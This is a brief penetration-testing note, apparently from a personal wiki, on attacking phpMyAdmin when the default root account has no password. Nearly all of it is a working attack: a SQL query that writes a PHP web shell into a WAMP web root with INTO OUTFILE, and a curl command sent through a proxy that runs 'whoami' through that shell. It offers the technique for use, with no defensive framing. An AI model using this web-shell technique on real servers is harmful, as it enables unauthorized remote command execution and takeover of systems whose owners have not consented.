phpmyadmin
if you get logged in with default creds(username:root, no-pass),
you might try running the following in the SQL query
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/cmd.php'
and run
curl "http://127.0.0.1:8080/cmd.php?cmd=whoami" --proxy 192.168.120.223:3128
or
visiting the url directory from web
Last modified 10mo ago